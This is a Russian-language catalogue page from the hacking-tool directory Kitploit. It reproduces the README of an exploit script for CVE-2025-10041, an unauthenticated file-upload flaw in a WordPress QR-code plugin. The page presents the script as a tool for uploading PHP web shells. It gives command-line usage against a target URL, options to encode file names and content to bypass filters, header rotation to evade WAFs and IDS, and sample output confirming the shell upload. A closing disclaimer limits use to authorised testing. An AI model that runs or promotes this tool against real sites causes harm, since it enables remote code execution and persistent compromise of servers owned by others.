Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-10041 — Flex QR Code Generator <= 1.2.5 - Неаутентифицированная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-10041
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияОбход IDS/IPSЭксплуатация веб-приложенийОбход WAF
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Неаутентифицированная произвольная загрузка файлов

Репозиторий
3411 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Неаутентифицированная произвольная загрузка файлов

🚨 Flex QR Code Generator ≤ 1.2.5 - Неаутентифицированная произвольная загрузка файлов


📝 Описание

Плагин Flex QR Code Generator для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов в функции save_qr_code_to_db() во всех версиях до 1.2.5 включительно.
Это позволяет неаутентифицированным злоумышленникам загружать вредоносные файлы на сервер атакуемого сайта, что потенциально может привести к удалённому выполнению кода.

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (Critical)

💡 Об этом скрипте

CVE-2025-10041.py — это профессиональный эксплойт-инструмент, предназначенный для автоматизации атаки с использованием данной уязвимости.
Он предоставляет расширенные возможности для обхода распространённых защит и методов кодирования.


⚙️ Возможности

  • Автоматическое обнаружение уязвимости (проверка версии)
  • Произвольная загрузка файлов (включая PHP-веб-шеллы)
  • Обход кодирования имени файла: Base64 или URL-кодирование
  • Обход кодирования содержимого: PHP base64-обёртка для shell-кода
  • Случайные HTTP-заголовки для обхода базовых WAF
  • Поддержка пользовательских заголовков
  • Полноценный интерфейс командной строки с разбором аргументов и справочным сообщением

🖥️ Использование

1. Базовый эксплойт

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. Кодирование имени файла shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. Кодирование содержимого shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. Пользовательское имя файла shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. Расширенное использование (комбинирование опций)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. Пользовательские заголовки

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 Справка

Чтобы просмотреть все доступные опции и инструкции по использованию:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 Техники обхода

  • Кодирование имени файла: некоторые серверы блокируют .php или подозрительные имена; кодирование может помочь обойти фильтры.
  • Кодирование содержимого: обёртка shell-кода в eval(base64_decode(...)) может помочь обойти фильтры содержимого.
  • Случайные заголовки: ротация user-agent, referer и cookie для избежания обнаружения.
  • Пользовательские заголовки: добавление собственных заголовков для расширенного обхода защиты.

📋 Пример вывода

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ Отказ от ответственности

Этот скрипт предоставлен исключительно для образовательных, исследовательских целей и авторизованного тестирования на проникновение.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, строго запрещено и противозаконно.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом.


✍️ Автор:

Nxploited (Khaled Alenazi)


Скачать инструмент